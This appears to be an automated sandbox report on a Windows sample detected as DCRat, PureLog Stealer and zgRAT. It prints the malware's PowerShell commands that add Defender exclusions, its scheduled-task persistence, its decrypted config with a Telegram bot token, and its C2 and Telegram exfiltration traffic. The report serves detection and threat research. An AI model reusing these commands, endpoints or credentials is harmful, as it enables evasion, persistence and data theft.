Edit tour

Windows Analysis Report
SfbAu0ICZn.exe

Overview

General Information

Sample name:	SfbAu0ICZn.exe renamed because original name is a hash value
Original sample name:	ba5406a838158dfaba199f47dda74695.exe
Analysis ID:	1629678
MD5:	ba5406a838158dfaba199f47dda74695
SHA1:	fe95b058c2739d9205b7b55084e66ddf06a0e2f9
SHA256:	1f2589cdb8f52ec0f5afc879661b583b41f43be6e649ff7be8f0485795cad07d
Tags:	DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

Adds a directory exclusion to Windows Defender

Creates processes via WMI

Drops executables to the windows directory (C:\Windows) and starts them

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: System File Execution Location Anomaly

Tries to harvest and steal browser information (history, passwords, etc)

Uses ping.exe to check the status of other devices and networks

Uses ping.exe to sleep

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

SfbAu0ICZn.exe (PID: 7096 cmdline: "C:\Users\user\Desktop\SfbAu0ICZn.exe" MD5: BA5406A838158DFABA199F47DDA74695)

schtasks.exe (PID: 4812 cmdline: schtasks.exe /create /tn "opHipgZM6eSo" /sc MINUTE /mo 6 /tr "'C:\Recovery\opHipgZM6eS.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

powershell.exe (PID: 6520 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\ctfmon.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 8024 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 1456 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4812 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6036 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\google\Update\Install\TMqwtuekPHF.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7184 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\opHipgZM6eS.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7224 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SfbAu0ICZn.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7568 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9stx3bi1r6.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 7720 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

PING.EXE (PID: 7872 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)

opHipgZM6eS.exe (PID: 2924 cmdline: "C:\Recovery\opHipgZM6eS.exe" MD5: BA5406A838158DFABA199F47DDA74695)

ctfmon.exe (PID: 7480 cmdline: C:\Windows\CbsTemp\ctfmon.exe MD5: BA5406A838158DFABA199F47DDA74695)

ctfmon.exe (PID: 7488 cmdline: C:\Windows\CbsTemp\ctfmon.exe MD5: BA5406A838158DFABA199F47DDA74695)

lYlhyYPN9gkdqQ.exe (PID: 7684 cmdline: "C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe" MD5: BA5406A838158DFABA199F47DDA74695)

lYlhyYPN9gkdqQ.exe (PID: 7752 cmdline: "C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe" MD5: BA5406A838158DFABA199F47DDA74695)

opHipgZM6eS.exe (PID: 7804 cmdline: C:\Recovery\opHipgZM6eS.exe MD5: BA5406A838158DFABA199F47DDA74695)

opHipgZM6eS.exe (PID: 7812 cmdline: C:\Recovery\opHipgZM6eS.exe MD5: BA5406A838158DFABA199F47DDA74695)

RuntimeBroker.exe (PID: 7852 cmdline: C:\Recovery\RuntimeBroker.exe MD5: BA5406A838158DFABA199F47DDA74695)

RuntimeBroker.exe (PID: 7864 cmdline: C:\Recovery\RuntimeBroker.exe MD5: BA5406A838158DFABA199F47DDA74695)

SfbAu0ICZn.exe (PID: 7880 cmdline: C:\Users\user\Desktop\SfbAu0ICZn.exe MD5: BA5406A838158DFABA199F47DDA74695)

SfbAu0ICZn.exe (PID: 7920 cmdline: C:\Users\user\Desktop\SfbAu0ICZn.exe MD5: BA5406A838158DFABA199F47DDA74695)

TMqwtuekPHF.exe (PID: 7936 cmdline: "C:\Program Files (x86)\google\Update\Install\TMqwtuekPHF.exe" MD5: BA5406A838158DFABA199F47DDA74695)

TMqwtuekPHF.exe (PID: 7944 cmdline: "C:\Program Files (x86)\google\Update\Install\TMqwtuekPHF.exe" MD5: BA5406A838158DFABA199F47DDA74695)

svchost.exe (PID: 3052 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaigns https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
SfbAu0ICZn.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
SfbAu0ICZn.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Recovery\opHipgZM6eS.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\opHipgZM6eS.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Recovery\RuntimeBroker.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Recovery\RuntimeBroker.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\CbsTemp\ctfmon.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Windows\CbsTemp\ctfmon.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 5 entries

Memory Dumps

Source	Rule	Description	Author
00000000.00000000.1656792148.0000000000B32000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1766711980.00000000132C5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: SfbAu0ICZn.exe PID: 7096	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.SfbAu0ICZn.exe.b30000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.SfbAu0ICZn.exe.b30000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\SfbAu0ICZn.exe, ProcessId: 7096, TargetFilename: C:\Recovery\RuntimeBroker.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\ctfmon.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\ctfmon.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SfbAu0ICZn.exe", ParentImage: C:\Users\user\Desktop\SfbAu0ICZn.exe, ParentProcessId: 7096, ParentProcessName: SfbAu0ICZn.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\ctfmon.exe', ProcessId: 6520, ProcessName: powershell.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: C:\Recovery\RuntimeBroker.exe, CommandLine: C:\Recovery\RuntimeBroker.exe, CommandLine|base64offset|contains: , Image: C:\Recovery\RuntimeBroker.exe, NewProcessName: C:\Recovery\RuntimeBroker.exe, OriginalFileName: C:\Recovery\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Recovery\RuntimeBroker.exe, ProcessId: 7852, ProcessName: RuntimeBroker.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\ctfmon.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\ctfmon.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SfbAu0ICZn.exe", ParentImage: C:\Users\user\Desktop\SfbAu0ICZn.exe, ParentProcessId: 7096, ParentProcessName: SfbAu0ICZn.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\CbsTemp\ctfmon.exe', ProcessId: 6520, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3052, ProcessName: svchost.exe

Suricata Signatures

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T02:06:37.536402+0100	2048095	1	A Network Trojan was detected	192.168.2.4	49734	104.21.3.239	80	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T02:06:39.577431+0100	2803305	3	Unknown Traffic	192.168.2.4	49738	34.117.59.81	443	TCP

Joe Security ANOMALY Telegram Send Photo

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-05T02:06:40.962383+0100	1810009	1	Potentially Bad Traffic	192.168.2.4	49739	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SfbAu0ICZn.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://047506cm.nyanyash.ru/externalvideopythonpollTracktemp.php

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\Desktop\IoSQRIuD.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Recovery\opHipgZM6eS.exe	Avira: detection malicious, Label: TR/Spy.Agent.yysoz
Source: C:\Users\user\Desktop\OUqOeHbA.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	Avira: detection malicious, Label: TR/Spy.Agent.yysoz
Source: C:\Recovery\RuntimeBroker.exe	Avira: detection malicious, Label: TR/Spy.Agent.yysoz
Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	Avira: detection malicious, Label: TR/Spy.Agent.yysoz
Source: C:\Users\user\AppData\Local\Temp\9stx3bi1r6.bat	Avira: detection malicious, Label: BAT/Delbat.C

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Google\Update\Install\TMqwtuekPHF.exe	ReversingLabs: Detection: 73%
Source: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe	ReversingLabs: Detection: 73%
Source: C:\Recovery\RuntimeBroker.exe	ReversingLabs: Detection: 73%
Source: C:\Recovery\opHipgZM6eS.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\IoSQRIuD.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\OUqOeHbA.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\RZKXfllq.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\YLtwtTHn.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\hyhVOtKH.log	ReversingLabs: Detection: 34%
Source: C:\Users\user\Desktop\ySkKLEmm.log	ReversingLabs: Detection: 34%
Source: C:\Windows\CbsTemp\ctfmon.exe	ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: SfbAu0ICZn.exe	Virustotal: Detection: 75%			Perma Link
Source: SfbAu0ICZn.exe	ReversingLabs: Detection: 73%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1766711980.00000000132C5000.00000004.00000800.00020000.00000000.sdmp	String decryptor: {"0":[],"TelegramNotifer":{"chatid":"8091631624","bottoken":"7879148704:AAFNNtpKlCmwPR7xOBNG2DRo_nYZIdzpXqk","settings":"new user connect !\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"False","sendloginfostealer":"False","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"},"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"},"ff275d84-13f9-47b8-9de6-a3dfeab3ea1e":{"_0":"Builds"}}
Source: 00000000.00000002.1766711980.00000000132C5000.00000004.00000800.00020000.00000000.sdmp	String decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-8b1zxCwdDi0myNJsjDFc","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]

Source: SfbAu0ICZn.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Directory created: C:\Program Files\7-Zip\lYlhyYPN9gkdqQ.exe			Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	Directory created: C:\Program Files\7-Zip\c743cc6a02740e			Jump to behavior

Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49739 version: TLS 1.2

Source: SfbAu0ICZn.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\SfbAu0ICZn.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49734 -> 104.21.3.239:80
Source: Network traffic	Suricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.4:49739 -> 149.154.167.220:443

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
Source: global traffic	HTTP traffic detected: POST /bot7879148704:AAFNNtpKlCmwPR7xOBNG2DRo_nYZIdzpXqk/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="b9b0179c-0f93-4e0b-aa87-b9314e29d2c3"Host: api.telegram.orgContent-Length: 99507Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

DNS query: name: ipinfo.io

Source: Network traffic

Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49738 -> 34.117.59.81:443

Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 384Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1728Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1728Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1716Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1728Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /externalvideopythonpollTracktemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 047506cm.nyanyash.ruContent-Length: 1012Expect: 100-continue
